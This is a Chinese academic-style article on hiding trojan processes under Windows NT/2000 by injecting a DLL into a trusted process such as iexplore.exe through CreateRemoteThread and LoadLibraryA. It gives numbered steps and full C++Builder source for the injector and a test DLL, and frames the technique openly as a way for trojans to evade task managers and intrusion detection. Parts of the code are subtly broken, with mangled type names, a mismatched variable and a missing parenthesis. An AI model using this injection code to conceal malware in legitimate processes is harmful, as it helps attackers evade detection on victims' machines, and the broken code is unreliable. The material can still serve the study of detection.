计算机理论论文:Windows NT/2000系统下进程的隐藏

类别:毕业论文  时间:2011-03-03   已浏览: 1491 次
摘要  进程的隐藏一直是木马程序设计者不断探求的重要技术,本文采用远程线程技术,通过动态链接库方法,较好地解决了这一问题,通过远程线程将木马作为线程隐藏在其他进程中,从而达到隐藏的目的。

关键字进程  线程  木马  动态链接库 

    木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。
本文分析了Windows NT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现Windows NT/2000系统中进程的隐藏。

1 基本原理
    在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在Windows NT/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过Windows NT/2000的任务管理器,Windows NT/2000的任务管理器均能轻松显示出木马进程,难道在Windows NT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在Windows NT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法
  为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是Dynamic Link Library(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。
  运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。
    远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤
1)      用Process32Next()函数找到宿主进程,获取宿主进程ID,并用
        OpenProcess()函数打开宿主进程。
2)      用VirtualAllocEx()函数分配远程进程地址空间中的内存。
3)      用WriteProcessMemory()函数将待隐藏的DLL的路径名。
4)      拷贝到步骤二已经分配的内存中。
5)      用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。
6)      用CreateRemoteThread()函数在远程进程中创建一个线程。
7)      它调用正确的LoadlibraryA()函数。
8)      为它传递步骤二中分配的内存地址。

4  具体实例
    下面是在C++Builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:
#include <vcl.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>//该头文件包涵了进程操作的API函数
#pragma hdrstop
#include "Unit1.h"
#pragma package(smart_init)
#pragma resource "*.dfm"

Insisting pszLibFileName;//存放待隐藏的DLL文件名
HANDLE hProcessSnap=NULL;//进程快照句柄
HANDLE hRemoteProcess;//远程进程句柄
LPVOID pszLibFileRemote;//远程进程中分配给文件名的空间
HMODULE  phmd;//存放kernel32.dll句柄
HANDLE hRemoteThread1=NULL;//存放远程线程句柄

TForm1 *Form1;
//---------------------------------------------------------
__fast call TForm1::TForm1(TComponent* Owner)
        : TForm(Owner)
{
}
//---------------------------------------------------------
void __fastcall TForm1::Button1Click(TObject *Sender
{
  PROCESSENTRY32 pe32={0};
  DWORD dwRemoteProcessId;
  hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
                                         //打开进程快照
  if(hProcessSnap==(HANDLE)-1)
    {
     MessageBox(NULL,"CreateToolhelp32Snapshot failed","",MB_OK);
     exit(0);
    }  //失败返回

  pe32.dwSize=sizeof(PROCESSENTRY32);
  if(Process32First(hProcessSnap,&pe32)) //获取第一个进程
   {
     do{
        AnsiString  te;
        te=pe32.szExeFile;
         if(te.Pos("iexplore.exe")|| te.Pos("IEXPLORE.EXE"))
                                 //找到宿主进程,以IEXPLORE.EXE为例
            { dwRemoteProcessId=pe32.th32ProcessID;
              break;
            }
       }
     while(Process32Next(hProcessSnap,&pe32));//获取下一个进程
   }
  else
   {
    MessageBox(NULL,"取第一个进程失败","",MB_OK);
    exit(0);
   }
   hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM
             _OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
                                     //打开远程进程
   pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";
                                     // 假设hide.dll是待隐藏的进程
   int cb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度
   pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,
            MEM_COMMIT,PAGE_READWRITE);
                                    //申请存放文件名的空间
   BOOL ReturnCode=WriteProcessMemory(hRemoteProcess,
            pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);
                                   //把dll文件名写入申请的空间
   phmd=GetModuleHandle("kernel32.dll");
   LPTHREAD_START_ROUTINE fnStartAddr=(LPTHREAD_START_ROUTINE)
            GetProcAddress(phmd,"LoadLibraryA");
                                  //获取动态链接库函数地址
   hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,
            pfnStartAddr,pszLibFileRemote,0,NULL);
                                  //创建远程线
   if(hRemoteThread1!=NULL)
     CloseHandle(hRemoteThread1);//关闭远程线程
   if(hProcessSnap!=NULL)
     CloseHandle(hProcessSnap);//关闭进程快照


  该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。
    至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>
#include <windows.h>
#pragma hdrstop
#pragma argsused
BOOL WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved)
{
   char szProcessId[64];
   switch(reason)
    {
      case DLL_PROCESS_ATTACH:
       {//获取当前进程ID
        itoa(GetCurrentProcessId(),szProcessId,10);
        MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
        break;
       }
      default:
    }
  return TRUE;
}
  当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具
也能看到:
   Process ID: 1208 
   C:\WINNT\IEXPLORE.EXE (0x00400000)
   ……
   C:\WINNT\hide.dll (0x100000000)
   ……
  这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。
5  结束语
    进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

1  Jeffrey Richter著 王建华、张焕生、侯丽坤等译  Windows核心编程   机械工业出版社2  
K.赖斯多夫 H. 亨德森著  希望图书创作室译 Borland C++ Builder 实用培训教程

相关文章阅读

1、英文简历中千万不能出现的语句   大家都希望自己的简历能特别一点,所以对于一些人所共知的禁忌和错误也都心中有数。低级的语法错误和打印错误固然绝不能犯,但是有时候幽默过头也是不妥当的,毕竟简历还是要直白客观,幽默细胞留着面试的时候再

2、影响简历加分的十大句型   2009年的就业市场与以往有很大区别,其中变化最大的是如何写一份有说服力的简历。几年前,你只要在网上随便搜搜,就能抓到一大把“样板词”来打造简历。每个人都用差不多的词语,大家都觉得“把这些词填进简

3、职场“鸭梨族”:不让“鸭梨”陪我过夜 工作中都会存在压力,本职工作也好,兼职工作也好,没有压力是不可能的。这股压力不管是来自何方,承受的人始终都是自己。 若能够迅速而有效地消除压力感,对自己是有百利而无一害的。所以,才会有越来越多的职场

4、职场需要淡定,必须的 职场中需要强硬的淡定心理,这简直是必须的。没有哪个社会群体环境有职场那么的等级分明,职务不同,意味着薪水、福利、所做的事情等都不一样。明明那人整天在公司就是闲着东逛西逛,但偏偏人家的工资比自己拿得要多

5、清楚地认识自我 当局者迷,旁观者清。很多时候我们并不能如外人一样的看清楚自己,特别是对自己存在的一些缺点,更会下意识地忽略掉或找各种各样的借口来掩饰。 世上无十全十美的人,上天允许人们身上存在各种各样的缺陷,包括心理

6、我们这么辛苦地努力生活是为了什么 从我们出生到慢慢长大,都是在生活,所做的一切努力也是因为要生活。包括我们的父母、祖辈,他们那个年代生活比我们艰难得多,也辛苦得多,天灾人祸让人无可躲避。现在的我们比起他们来,实在幸福得多。 但是因为我

7、创业政策:西部大开发“升级”十年创业商机 全国政协常委、国家发改委原副主任、国务院西部开发办原副主任王金祥日前透露,我国西部大开发新10年规划正在拟定中,将于近日上报国务院审批。据了解,作为第一个西部10年发展规划的延续,第二个10年发展规划

8、女性,除了经济独立外还有精神独立 偶然的一天,看到梁凤仪发表在她博客里的一篇文章:精神独立。 这篇博文是这样的:今日的女性要经济独立,真是易如反掌。不必是职位高的女强人,普通一个售货员、文员或侍应生之类就能养活自己,不求别人。轮不到你

9、休闲娱乐之“偷菜”说 白领们的休闲娱乐可谓五花八门,种类繁多,丰富多采。趁老板不在,利用上班时间经常玩点桌面休闲小游戏,算得上是劳役结合。公司的同事经常资源共享,谁要有个好玩点的小游戏立刻传遍全公司,只要老板一离开办公室,

10、莫做职场“包打听” 公司里的小道消息往往传播迅速,办公室里经常都可以听到一些来路已不可考的小道消息,犹如一株葡萄藤上挂满果实累累的葡萄。 无论这些小道消息是否真实可靠,又或者只是道听途说之后添油加醋出来的结果,所有人依然